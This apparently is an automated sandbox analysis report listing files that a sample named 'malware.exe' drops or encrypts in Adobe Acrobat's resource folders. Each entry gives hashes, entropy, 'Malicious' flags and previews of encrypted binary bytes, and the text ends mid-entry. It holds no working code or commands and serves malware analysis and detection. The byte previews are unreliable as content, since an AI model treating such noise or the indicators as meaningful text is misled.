                        Preview:.L.d......!+A.'l...a].L.K..nx*...6{...c ...)...]..3I.(\..V\^..\.ZqU..y.~{......B4,W..j.8|U.....b.0.A$.......[...).o..... ....p..#jL..l...s:yz{_A......k`?9.fn.R....A"...I]....... .s{...........r..H..?|.Z...7F.lQL...cfb.......Io.Y.k..K.L....{j.......c..3....Cuh8....5)...l.z...\..A.r.....1..e.E....3.e.g.y..<._'.y.-.?..Q...z.......C..h..@..yxT.....J%..4....da....j$..6.I...G...hEG.N...W..l.[!..=s{.R........W;2..1...V.@.l.%.1.>0'A.m.......&...=...y .."\,.A.E...b..c2P.O1.5p/.....x)...t!......A.f.....u..z.|lo.*d..M.n."d..)...GU...b....K.....-hwi....c...7.s'..E<....G...&O.......JO.x4A .'..T.u..8..;...K..G./.o............j.rN....f<.4".a.~G..wG..mz.R.]..;...S...?-^..a.l.>.*.w....1..h......Vh#.\2y@e.....W.Z5B_..2.]......e.6.+...N.n....s.\...........6D.(a.[..f..X../..Z.....h.B.B.iN/...J....8...D.'?..,#X...:......agT....}%.W&.H...[.pj...&f\Q.U.>..=.F...$...!....8'..-M..do...4.......#.!..BH..0.9[*p.. ..8.....e...`,>r.........;9f..'gz....j...}.

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\dc3b5d449449a5103f90189b239c0bf6.png

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):110006
                        Entropy (8bit):7.998234729190166
                        Encrypted:true
                        SSDEEP:1536:tpNLxiFadYM5k2lkoZZouNW2UREsX223P8U30Rv+/LdUVfGlH2Zjg5VAE7w4+P6b:jNApvB42IfUjt0U8v++GlHAEgX7FKBB
                        MD5:3A24C15F90394E9FD563E3791273C53D
                        SHA1:D149740780120457F7E456CE85C0D10362CB492E
                        SHA-256:C4A8B80CFD393B414A070B5D7F98934402ED418C0493A9C79F9FE25700AEB447
                        SHA-512:53984A4820F125E3206D7C7A3C96864B179BD71F8DC2C6FEB7C35A3B848720FEC63EC34844AD1EEE7373415A4F180646A2A2EE81315D11DEB9FFE95D9000576B
                        Malicious:true
                        Preview:G...l...\...."1..#6NNb.....y...[..Xh..g2..8.E.P..=N.}.*;...u.o.....MI....08.......<..,"?.%8.....@./r...<`S3......8H.uW)..AW.3...o...WVn..q.`p.....>..)6".j. :....o. ..V....!^K.>....q....[).:>..#R......h..}.*.v/..@V.>U.S....E.|. .........E....g.3.Sl..%p5Z..9..Pa..3..U.F-Z...c.T..*..%.Kc......v-...&.,F.G..F..t2+).P.....8..g..KE.P..O..XR.>..j.n..nEqU.v.g....................X._..\U.>.28.Z...W...f<.,..Z.81IVG..G76..S....<.o..%.'....I...h.!.7<..jQ|..nV.T.....^...oJ..L....j.H`z.}.h.n.... `..'...y.....?8....o......Yq.t...c.u...6Xr..5)...#..+..`.(._.<.yqSnY.p.;).Q.A.'..@.m........@....v.0.-qf.Y...GFATE...m..)..R3?.#nQc..|.m...0....1q..*....Q.y\..l.t.bm..."A.[.p.l...x..~..U7........mK.....b.@.<A..Q./.%....|".->.N.|5Y.KF.C.X>D....>..E.u.FF...fJ....=.c...t....)..u]]q...h...r.]9\...&.`..x.(K.tv..w...K..............#.....2......&b.S.A..E#\..*.yr..F..*.y...~.m....C."..S.:....[!...[.E..3.4...p..:.^.O$.^V...jdb..cD.9.5..{B....X....!....;>

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-ccx-chunk.js

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):61566
                        Entropy (8bit):7.996856104785919
                        Encrypted:true
                        SSDEEP:1536:YehXQ34kWRUE7jQQatHTfxvcspjpb/iSoVMBhgkqHB:XXQ34kYHQJx0Qjpb8kqHB
                        MD5:AE00D924C32860CC2FE8ACE02819CC09
                        SHA1:3C34EF07111AF0DEDDEC84A09037288AB4FA8361
                        SHA-256:A1C19FE2F2FAB7364E85501129AE9F9D6E95D7CEA7A2D07318565C850ECDC379
                        SHA-512:C25CA87C75F3A9A6B07C3F52358187CA4D09FEFE1245F594D360D8AEC12390B9D6BE9F7823BFB38C7111BE730D393797F2108AFB638DF92D1C33735C0B56FB87
                        Malicious:true
                        Preview:j...L..Fp....f.0)X..l..X?.t...f......."c.q.C*<@^.I.>.H.&.7...r..%...H<v..P....{..#.|o...)..k.......g.]i..=G.i.|gW`..AS]6...u6....#....I..........,...........,.C=. .......WJ...P.C(u......q.....R%e6..{...B.~6.\..&v5...Qh..6 .8.f..J....j.........^a......Z.L<.tVw....&.={.....{...*.._).:.U....e...x.Z..jl......9=C.).HD.gH.z.q........#..K.A.9.d.5...l.J......v...X..`(.C...13=HL.u..yL.3........c.h.9....fX..q.../.Z.i.A....vk^..(.7!.h_R.Q..n.5.Z%K....)....%k.K.-......0.iP..=c../.>S..5..54....I5D...Q.k......C.V..qbby.,g\.At..\"p.+..7..YZ...,E|.;...\..pK.R...y...2.`b....?.7...l..V..w..vio...........E..Ykbf.hT..*2y.........,.<....~...<.......T.....}g...........I'1\....)v........6.....m..y..i....t......5..!....Z.V....e........c"....=..8....F..e...!xMn..]+..{.YJ.T[..".Z..........GF...|im.&....... ....09...h.].A51gG..1.;.W1.,| .....7;....y.Sigq..(..yY.p..Y...O......d.7....d...e.."...c..$..7._z....lr\..b..&I.[..?..Q.....e.IEV6.+...o.[........+B...=Q...J'T..c.

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-ccxfeedback-popups-chunk.js

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):26737
                        Entropy (8bit):7.9927390994059975
                        Encrypted:true
                        SSDEEP:768:9VN4JB00NLhx4neySaDGqug4HcawVroZ1qTGHI:9VSb00N38q448ai21qL
                        MD5:1129F81B964E1D5CCE25D2F2574CF639
                        SHA1:64960ACF8D8E729C761EAF7DBFD69F40DA6F4A05
                        SHA-256:968069D3AFF06F4D24CCA985F2737B704FE5F2990EA9903E8A98574BDC04FFF4
                        SHA-512:1075F06061244289D55C946632B5530267350613D55BF0199FE0AAD61E16E989090D083CB227E5581A92F3ABE775DBC390E90322C7014FFB39B3845447488F90
                        Malicious:true
                        Preview:.(&.....TU......D......K..c/....."...^....Dv.+...6..4lS.L.r...r....{.@.......t..~...9.4<3.....Kg5....w..B1.+..-.....U..\r.m.r..*,...r........~k.4..A..yeD....7.....H.~U...9.....`....+...1).H.....x.g...2...a./...Z....(.k..../....p..p\.#0.........6..pT.n~.}DZ........h ..|z.~v.....nZJ.&.I.....".G\...+0..u.t...9.;+..l..,.:..y..H..5.....}.{h.{D.,..i%.B..T..`_gA.a....!..)..<......Z..[L%.^.3.O^.z.I{|m...;F.....<W.....T..Z....."2..L.=......".E...>d...9p....kf.T....]..i...H.......NP...,[g3.^.|.. ..f....#.eo*...M...K..3..je+._...:.9.:*......G..).Z..p9..b.SY....a..4X...|p.xCV.q....*.]........,..k..|....m........}.1e.."..O"...c....g.F...}...qav...f..Xo....).Q..}[.J:.e..,.Oa(b.k.....n.W.e.g..94..R..w25..Q/>....C.......WL..O..i#;...c..5........8.5...+..V.O.X......{....&...$.i.M.*.;...kq...._..BPw.._.L../.V...pM.....~.C....S2,.]...vw0....)..9v.=Gq.T..;.../..tM...^..g.\u.>_.&z.26....`.=....O....hG.............|H.V.g.0i..L.O..o.%......!....*.&..kQEn....}`.1.

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\upgrade_top_image2x.png

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):467824
                        Entropy (8bit):7.999581127377135
                        Encrypted:true
                        SSDEEP:12288:5AkjnwVZJhe4VShahuyR1S8S/+tYDtaSwBrCH54TLOHqW1qKZpkz:Yhe4VMfybSlWbSYrNOHqW1tez
                        MD5:49A308E54D99514172DB877CB2B21A5C
                        SHA1:00A6A91395C07E11A072B0FE3CBDF03AA874D254
                        SHA-256:653B30E9B4E92BDE4FF61AD316BC8E1059471671087F5919FC378EC348D973F8
                        SHA-512:85DB8998DD26A17CDE56E748DDC971130CE2C0063133A98590C78D86EB650425ED52FF2FD3F472F9D22D631E256C2955FFE833205DDC309053C01C6B30A1F0D1
                        Malicious:true
                        Preview:....4.s..D..4.{l..c.x..S.C-2..L...0.Q..f.0...:.#H{.....y...NS..C:...E.....c.l.j..ZW.[..g6.d..x...`.M.5.G.....}.Y..1O.w.rAD.Ve..#M"9.u..P......*..A2.).|..F2..o7....>0...ZK.W...$. .]....l.......3U..C$P.r'./..A(............P.".w.@...3b.'..T<..J.O....L..G[..........O..s..6.....pk..w8q!y/...e.vjPPx.]C...H..#...oQ:=y.Z.C..8.].412.M./o.w....T.....".+...+N$yUf.V.......+..U.....N..._6.....4Rf.3.\..6@..&`....}}........&..uE...?+L..UK.}U.(..l...').F.g..P.....; ...'TR..vg.....3.........-Dt.....Ln...{8..:...x,C(..<.)...._...C.........w<.-I...)... .z..(2..z/^.z..0...6..`HQ:.g......F.zU.p...q.....xH5yH..F=SVi.`..+i.!...!...5.7....B.d..6.56.-...'...>...*0`....L.....vr'..F.@37&..P5..g5.m.......e.EC..y....$...&.R.\....p.5._x..;VO.Y!...../%.l..{V.8.;.....a.}......2".\./..VM.....I4..F..!.U.....t~......N)...o...5....[..(....k..1-f....f.......-.O`qx....02~..OS.d`T.h.9._Ffp6.....F..p.Q....#!......[\h...mN[.W....D...VtwKi.4.`.K.>.on_.H.p....f....8.; *vE...

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\powered_by_adobe_sign_old.svg

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):15360
                        Entropy (8bit):7.98727350134359
                        Encrypted:false
                        SSDEEP:384:hSdOxSqcINVJqkQ4rNHl9OY5uhn48ie5/01z84:8dOxSqkpMF5uhn7ielcY4
                        MD5:1C648B66A99EF0883F1F44F99811DFB7
                        SHA1:36242E6ED30FD77F84BBDFC5029E67122D1D2614
                        SHA-256:DC2519FE637874FE9D27424EB7A9F4A58C0D8B79BB1443991C8E325329848102
                        SHA-512:6D8C85C4C7C84388DDBE0C54ABF73E143BFFE3F463FF68885DB5725F5A425AF21E064C33EC02997CA0BB2002BB653D0DD62CBB5C50FF6949F63A63A387EFA6B9
                        Malicious:false
                        Preview:..F.].i$T2....U...*.....[....D.ZdlI..1.56=}f.+.6...B..t...2..M....q;.R.feeQ@...x..._m....".....:Sl.Y.].4.b..8....@i".vi.~..]n.........N..,....kU.d.R.....k..'../.!G..`l.r.4.zA.5..Dqp{.c....&..{.|h..r|lfZ.L. ...;.`.m.jc.D.....v/... ..h.$\.....k.E....w.E...r.N....-`H... ....-./...v.i7.,.Q..H.j.....V@x.hm...i....5_.......#...D.q..."...(.....\..%.|.....n....<..s.m..$_....^...o.-.yP..gT.a.|.].`i.ye....bf..../.6%.Df9..Z5.!?.LkQoN6....E..".....o....W..I.........K.x...a....[..*.uVf...>.{.~..B.....]1I./.CuD(..0;B-..kav..c..9pQ".Lt]....SI.c....,....1...Fp.!...4N.t..w.4O4......Ra....Cf..K....>zIuu.L9.+.>......#e%..{..t.-.P.{...z.ob....N.09.....n........&.;$........<U`J.V..fO....} .e.h`.)X0.,c.h...XL...XT..Y#..X.W.$..V..........Th^.|...k.C.R...1XD@h.)..1$.i...j.....F.L..2..Z......,..r.. ........sH.8.........P..1...\.g..5.2..-.d.:S..r....m..q.&......#...t.h....X....F..e.Gh7....G........pXyQpTP....:n.....F;.....~..N.P.LJy...].U;.".....M.......i.

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ca-es\ui-strings.js

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):19593
                        Entropy (8bit):7.990311024212761
                        Encrypted:true
                        SSDEEP:384:7PiSBinSMUzRXouF0gdqmNJGcwHAea2+dIc4NTIJWrWJB7aW1R3qdyzrqB0RRNR:7PsnSR9o+9dzJGNgeL+69T7rmZadyyBK
                        MD5:2A02BBE136A5DFB4312A503CCC5F7771
                        SHA1:EC49152C58A27961E8D5DFD2D9EB6D3727351FA3
                        SHA-256:290D9FE10F4CA98900D628C1AC5D3E66F819F863DE36EE2874C8B6940F0BC99F
                        SHA-512:47837E5BF21235D3E9CC74A70C256889661E3F197D11B43B0B10F5918356E0241ABCE78159A19EA1812EBD8E786FF073DC26BF38FBD03351D3C49C353D668801
                        Malicious:true
                        Preview:..z......l..".Z'.^]q...V.*`.....r...p.=..xn....TL..(........B.l'*.....AsRyo...U......j.&-.z..[.3.E.%o..$.,.^H.06..B...Eq..n.6'....J..a7...V.x.w....U.m..{...J..u_.~.k...y....,.....dj..T.uyq...<.g..K(c.3....)I..!....Q.._..*..h..;5)b.7;N.m.A.....'.........jb^.%.l.tj! ....3.FO" 8..CP...........J.L..?...YM.............:c.U-.g..(.8.Gc....*..A.c...b...%P&....6.tP.B..#!.....j.g9.t..]..o.\|.[;u.!Ia ......:(.~.&C...L.b..h"-.+.....A.jl.QWQ:.k.f......p.k.......M....5x(z.Ds.5]....e...-..m]S....R....i.yj{......r..5}.Y.bB._..'......).=|..AL...[...u.~Z_....~..\.F.#..<..V.....aUpzUE.=.T........v..IJ..r.y..Q>.u.N.[./~|..e..$.M#S?..R......n..mo......I.u....{_.V...W.v.&.B......?+.;.,.@..c...V.>.....I.J.Q.U..2..i.w..Oe\"#}+.......t.RQ/....w%>....Am......'.6.bi.... W.5..wM".2Jk...b....=.'..X..?.........T.T5....d....Ak..O.U...?..............`..d...wq;......n,v....wO..n..."?O.b.p..~^.A.7v0.V.#...v..{.......A....^..w.?...W..1G)MyJ.V5.m...s.:.h.l}u.-J1.....L".k.Y

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\cs-cz\ui-strings.js

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):20380
                        Entropy (8bit):7.989679210078504
                        Encrypted:false
                        SSDEEP:384:2dOmJHzCM/aFAeW5WE42AUic15WkiuxCIOOB8HA7PQqXmk6C2X3+ym/JYLR:2dFH3Tl42AUWYbOOSHAkqXD6CQ+ym/Ja
                        MD5:23467E2325163B0D5B8CEA39FCF476C7
                        SHA1:DC35821FA92DAB5597197D68E687EFC7F12C6C66
                        SHA-256:2D4B1670A2EB6A2026E7CF3EB3836A53D067F1729729A1CFD1EC7795B344E1DD
                        SHA-512:F86AAA742AE01F09A6E12175227364F5FE8647A5F237BEC20DD2976FA9E21A4F543352F0F87ABCFB171960F4EC9E0FA3FCCC293B9782A582D1F55BA55E1C6259
                        Malicious:false
                        Preview:&4.>)#V*.....z..M$........`.._.yVZ,.W......c.@`DT.G.'.....+.g.l.'.....fV........l4..W..T....#_.5C4....d...(.B\N......W....&.....pSx=..r..............T.8....a&.)`...Ek.....<...O..!6.g.9...t.u...%..@..,.........v!84.$.|>...X..x.a7Nc..5.r....m0....Xw.U.)[..f&.mr....h&.........F...m.N^...C....F...(.z.Z"..1.....y<..1....b.c'x....pV......Q^Kp.m.{. *.#.Or..s..4..gS..{......N..O..!.....0.f..K..K}..>=..M{..;....R......v...?"M!..0F..(.b4..0.@.@..{..k...R. ..B.......[w|./.].........<"\.\!....n..n#g. W.....f......Jqm...,.d..s!u;|FO......+.8.*.2...l.P.....+....o3.K ....OAm%V0Q..A..*.............>..:>..S.&.E...2B..%.............t..s.@#..B..,..^....q.."6u.*.A..P}i....N...}bG ..r.c...O.K`}._.S...k'..?.\..$..d_..B.H;.W..g$..p.8v8......P...=..q.h..x.W...Q.|.......%..;9z...@..b...T}....FowG..".(..JM.=....g3.6.f.P......U3/*.r...P.3.,..|.U..m.d.n...a.(+;..I....i..7......g.$.."...%..NM.^:..80...?<..z-...Y.JC.....9..b..>.C......?........H.'.Z.....b0..u,.Gk.s)

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\da-dk\ui-strings.js

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):18686
                        Entropy (8bit):7.989856605513339
                        Encrypted:false
                        SSDEEP:384:EjhBEBH5kMMN7GyZuDkdxfHEnbessrLmhqnl8:mhuBH1xyZuwnHEnbVs3/O
                        MD5:80CCD5C75583924A1E02E4793062F87F
                        SHA1:E9F1C0540D3E1798082AA64C81545FEA8EAEE3FE
                        SHA-256:5A5988652FD25852D56F0210A0CA4AA5A1365A1CAC626119A63A1FF5D39AD588
                        SHA-512:62F2ECAA5E498B3CD120B762E08D3F563EA47EB679FF1DA1037D7209942EC1924BEC19A8968C8E9DCDC085C0778C55329FFC1028123D790FA2436970A10AF05D
                        Malicious:false
                        Preview:......R.l..6.....^....#.3%iy..^...9.....X..5X}....;../z.y.*....Y..........ja.>...S.l../...v..........%...R7.z.j...z...=.....O` .l.&.w.!.r....y..=l.?.B.....8.u.^fY1.....e,..e..v.....0.$~J.Q.d.M(....r5..M5.hZ........Z...\.....Y6..........o.U...x.#].i]..*\...y_..X...|l..q...^w..[.+W..9........K.'E.....Fx.`.3.....l.........W.H."<j..f....?.z>.....s.Cj....sd.......%.... ..{.6!.^....j.....gu..;.........h.(S...6Z...........<...U..U....m6...CT...z..A.|.W8.r.l...~.Q......z.y..{..|..........&...ml..E...6:.I.B'L.av.k.qu.....-..D.6zDP....|...:.u.A:...../9..~..%..6..C^HY....LJ...c.w.T..@6y?..l.|. K.k.Q...S.f.*.ix..g6.5.0.Y..d.1...d6~Z........\AA..K...~.l.2 P..>.XMtI..U...BnI..2..g.x..+1......*W..|..b.3h..G.W.(y+!...b.d..W.....q..=.q.V0h-Vnv.b....S6..#..G.....k..+..~......x.......+...A(.g....x......Q..Nf.E.a>...+.Zk.X..U.%8.......4-.X3/)....u#...k:..c.y..5.'<...........kEK0....&..3.....r(...QkL....=._.....U]....b..W....k._&.{+.[9.. ,-.......

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\de-de\ui-strings.js

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:COM executable for DOS
                        Category:dropped
                        Size (bytes):19934
                        Entropy (8bit):7.991031239653745
                        Encrypted:true
                        SSDEEP:384:JbqSLJ1KFASzkFNkXmDuyFurReTBROUz+xIK+iIX+6Yk1/UIUlOk5dYM:JbvJ1kAnFNkXrUTnWi+6vhUl/Z
                        MD5:5AEF1604F6294BCDF1E2B7FD31936C50
                        SHA1:03B55DF86F0E78C54E9CFCA4177C6C303263A99E
                        SHA-256:42C6F78DA257BD61AC9C9C9A9F4187659EAAC6B3DB6A3836C24243286B103ECC
                        SHA-512:8703202E949AEB4109FFB91524843863EE099A84E9FBAC218C61754FD00A08159FDFE5A20199D9BB4DD4735D28BB3D3756D3D5B44FA4C00867932564DACC31F1
                        Malicious:true
                        Preview:.X..l.t...J2......p..0..>7/..._...4.XG.[.X.|.....N. .L.^B..l.o..t.}Z..;4....Q...%.p......j.X6U..$I$.D.y.......!...4.W.W.Q....{.......q.[.su.i...;. `)...?.Mj7F...%"a...L\Ym.ME....O0...6.1.d%..z[.e.QW..Ow......)@.e.Se&.w..: [.R..5N..j..6.E....).!......\'......L.K.D..g...<X<.....$.v...8>.....[vP.F...6...y4vt\{E.&..w..ji....:..b.G'jZ[...c.V.G\G......t...W.j..N.(......d...8.....v{,.wn.4.UR.........rw@........A;..).F6~.......*.2!.7&PDb.<....\9..Y..U...S..d.?.Q..#ax..8.[Z.]X....j.. QO.{...q....X9.R.}..c..J..>e_Z..2.X..3..q.E..~..\`..eZ...)5.........-{9..VD..TR.#..$...VX....TlA$.u$y}X1....L'....z9.?...Z>1.w,g.,..>..M.K..n..}iF....;.0...3g.....R}.52...=_......X.{.`...q.yV...!..<.........3.......;.....\.....v0w..?T O.K.rv..`._...^.=..V.K.....v..a..m...(A.A.s.F`.<r?.Y.U5..K.x.{....U....AW.....Ql.!.6..0.L.-l.R..e...`r....../....!..;..H..e....!..l[g<M@..b4FeF.G....t....Q..c..eP.~...F..,..=..)eP..>Q.A..h].=..G.mMX..2...d#...e.lc..z.,`.j.....uX3.P....R^,.wRn0.RZg.?.@

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-ae\ui-strings.js

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):17744
                        Entropy (8bit):7.990122759173213
                        Encrypted:true
                        SSDEEP:384:SxSzaMPj3Qd73R0L9jMMyokkY+dgWH1Yd+6M:SManjRKFyokzkgWH1YVM
                        MD5:1FFABEEC6386B506D0CC1808946EA0F6
                        SHA1:397C8C8A026A543E8906FE21E54AB799F595168A
                        SHA-256:3D2CF07D0E0DF3922196ACE93B8DE67571F3509543A3CF45982FE226E327FD2B
                        SHA-512:2190FCF0199E688A5CB9376EE7B1A89253AD2A354F444C19003BF2112744601140B006366235BFDA665B1140332E2AB6F7E5905F545422C84DB4DA0C5FBE08BD
                        Malicious:true
                        Preview:....@0,8.....S!:QBe.......,r.......}'.}.<...z...Z.._.T-...%.......[.v..........\..G.DJ7.\.......b..y}...E.I..T\..WFc...#0.K.g.`.....1....U.....D....c.%v.W.._...9;m[./U.ot....3Y..n.h\.l.OTR".y~%\..M..s.C..pF...j.8...J".69.R.......O.._.,....6<..B..l.v.kC....h.~T?.......[..r.)i\Ov<.z..........<..hr..-..r.{.C3"f..."..NT..lo.0J..P....f.b..B.].5etsD\.R......h..t...M.5jr...[..=..I.... ...U...$V.2..w.......=.......)..7#vV.7.vsyJ......L.P.r.[\u..$...Y.~^.............H:..C..T.._....p...n.[.G.y....V..c.y.M|Q..8.`...6..=Y.)_.C5...keh#..........3.7`.B..S\0...I..$.........h~p[rn..*.~.9 ..._..!*cr..Y.....m...O..EB <...O..'..<....T.Smh.}.ii....dHA..8..../)...n.B=...>q.(...ZP'.8.'..c.g..2...hxM.m.o...2.!..x'..;3.n&......MG..#.-.3........y..F...v.....<,..r6.t.E...\hm.3......E..cnU.(E~...V......._#.".....}.D...I.#o.r\s.;0F.A\s.f.%......[x...`...h...}k_...$.8.F\..t...)2S..\.......F9....C.....M@....foaN.2.!v)....{7..TH.4..........\p.M<`...3.7vg%.q.E.)@.]z

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-il\ui-strings.js

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):17744
                        Entropy (8bit):7.989859851411108
                        Encrypted:false
                        SSDEEP:384:LLu4KEkxykCoZ1lAD0tINp4EEmVc5uqj8LpOgaPt9GGz9/bR:Ly4KEboZTADXam6j8zitYspR
                        MD5:D6934F57CC4E32F3E4F626EFC798AA0A
                        SHA1:BDFB8A390BDE9B8BC1AC54223AA7CAD127CEAB27
                        SHA-256:55DE0C021976C42C4E94649B1FBDA7C845008C75A22E922265961FE665794AA8
                        SHA-512:90DF1111EFAE551C39C3953E777492C8E9F939260EAB2F0267C7D70B2507B948EC558D60948E468DC76F2FB1D3065CAF1BDBEC9FBFCA977E450D6F7A3DA34992
                        Malicious:false
                        Preview:EfC .77...mR......J.g.k..-C<.*.M.P..X.Y+...w.=j".1.....G.S*G.8&......{..(....Q.l......h.Ie......dW'U.>.J;6.&.$...l..N.3...+....g.gQ..)..e.....V.......+.p.............D.....I..S..{...e@1.@.H.A.*.......+....&...f..O....d.-/..q.....A...C.&.t.....&.q....:.h..t.7..97{.{k.t.....U.-..2 .....vt.I....>..@.t.j9u.}6..G@o)..u\.XA....7)...!...v...H.^..`<.........JO9..`...-...E....Tmd......r...DaL.uz..q1$4A9..VE..t...$...Oz..X.....-.-...YR'..H/S.N....*.re.zQi.\.(..x.h&....*AiZ.,t.%.=..?..D..Z.%6...O_..o.......rb^.P...`..B.......K.yp../.....'.l..OW*!...x.....O.$.i....+QVQ&..Q.....$..}r.?...Mzg.S...R....;..b...Og..|..|..^..A.. %?...y)........G%@U...."a..Bx.r-.......*On.3=.....4A....6.v.r..N-.U..=..v=0.c[...}.(a...J.G......h.M.Q..bYx..D.b..r#H....fJL..rA)..'D.=...P.w....<..9..#..^...pnY..]..^;...A..R.E..h...>....bvl.q.6..je.......ha..Dv.Y....}..h.Y..1.H+9......g2....+.:....@#jn....+."B-..Y....|,.7....p.Xo.$|H......../.gc.N=.......R.._.eG%....]..

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\es-es\ui-strings.js

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):19788
                        Entropy (8bit):7.9908271723381725
                        Encrypted:true
                        SSDEEP:384:ChoS7yY66tVYb2mxYXX/dlMXvYiV+7ypm73VaHMfY/kF:ChovYJbkSXX/dSvYI+7ypm73VTAsF
                        MD5:AF845570CB1A419ED14AE322CF6E7C1C
                        SHA1:4C1F9FA52F45C00C12AD2005A39D95D7C5BA39CF
                        SHA-256:E41AEAFBF39C6957ED383EE3FF5220CBC726B0E739B0FC9741DDF2BFC605E095
                        SHA-512:C5718A76B6C9A9506933BBD9C0F3D7690F5FDA70988169614A1A27F5120B85D274C05EE5674408023A3C2472C4EF7119913BC91DC8147FB71203E4D30846A0CC
                        Malicious:true
                        Preview:.....[.W....h8....D...D+.....|......1..?^t(.....s9...Ty..KgNc?...?...Q.).=[.4.|...4...k.!.c.srEg.........\..%B.A.4.........N......2-.WP....."M..M[.1.0..`...........V8HV..'..Bc.Jo.zi.i..S...dL{...k.N~.[J&Gq+:GH(T....|.......P|..VL.r.z"..+.V6_z.Z..L.v.5...7..m..f.|....O..... S..X..]...@...v.......?..K....].f....h+....&y,m..0.r...5Si..e...e..1..n..O[.......W.B....q.....Rf......4L.9...Z.U.~HL.H..\.....,..-...@.K..........j.....AV.n`..-5....X.m_....T..)X.TM.K).x.<;....T...!.#...^...V.........g..B.s=TP.....s@P...M.D1&.....)..d..2.3&.We...2.0c.N.LJ.'.4....{..-.e.]3....%.*U.4....z...-.....$.}..JT..w..8d....?&.....T2.,9..J.^;O...3)...!.m?gC.......x.J./0.....?W}...X.....k}`.E...i..b..}..tais>..I.bz\.P?8A.. .....|h...oV..iV.O.....%....ePh.....:....7@J...C.ht.. M..qA.2....&.......,.....0:.t.. G_=......N8R..~a.....A...]...J.....t.T.z8V.r...t.M..8.....Kg$..{c....O.7.Q......q....u.\.Lo.@..J...../..LX...@.-.v..)..<..r.&m...x.$...y.x..&....P.)

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\eu-es\ui-strings.js

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):19463
                        Entropy (8bit):7.9915929466553886
                        Encrypted:true
                        SSDEEP:384:ViMEy/AyJ7mESWR0Dnq/9sNO6weZ2Za2uNPDo2fRJDrLn:EcJjH0Dnqlv6weZoGJzfRZn
                        MD5:C7A7DE18A9362A623A5EEBA7A488A023
                        SHA1:ABAC52270B40A553174306485B6EA0B88030C030
                        SHA-256:8FA8788ABD605B31DDE2F25EBDB976E29A373320245DC2985FE6AEA58974F9D0
                        SHA-512:5F5D1256697ADDD225B3269F83699C7751E9339A8F54B0E6615DA07B6F3CF86ACBB05BE59C090874BA5E9AB03FFC1736DAD3D54D70A9E3688E934DE68A434FD1
                        Malicious:true
                        Preview:{T.M#.?.. .wkj3y...*.x.Moje...O...Y....K..'."...p....)y...".1...w..l..... [..A"_.db.G..'.K..ML..}..Zp. ..qi{.`.l......>...dl...u....@....NM0s..~.h!........P2...hm..$...BH.75.AI.J..i.c.|..D....w.hS.gP._6...A.W.....4@|c73b.....B...E..K.YF..I;.X..^...4................s1.i.V&....}..l.N....F.z0U....'...T..#..u..)q.xk..6'.N.\J.w...tb .4.}.5.IG..z....sDaZ...T...O..gl."...p.....#L.l..^.....1..f..t.......5.....\.`.SY$+..............O\.....PZR.y..i+..@..M\..SLg...s3rL..@...y~..Q...;....K....U#....Q`w..Ia.c.2.K4...T.[w.Od...^.u.`#..k!r..,X.kX...........h..H...L9..2.3.......J"....b.v)1-.*...I._M....A..7.O....n..j/w@.rL.j..*5.?......a..D....dla+..]..../.../.p-..?.R^...~.......8.t,..MOo.A...0F....r.. .t..R..gT.....Q8K.....,6.6..3X.G.n..4...ZD.F..{.Mc\...A...2.&.,'.....$.?N...{.n.9.c...&..,..(e(..yR....x...c...y).$..%6...o.0Iecwc.7.j?.,.".t5M<MeXG.D.y..WF.Q.......k...g.dp.L...].X.4..D ..s,o@.VW#D]..).....6...\..+y.@..D...Y.A|..<Wn-.q9.I-....

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\fi-fi\ui-strings.js

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):19473
                        Entropy (8bit):7.9908969241119
                        Encrypted:true
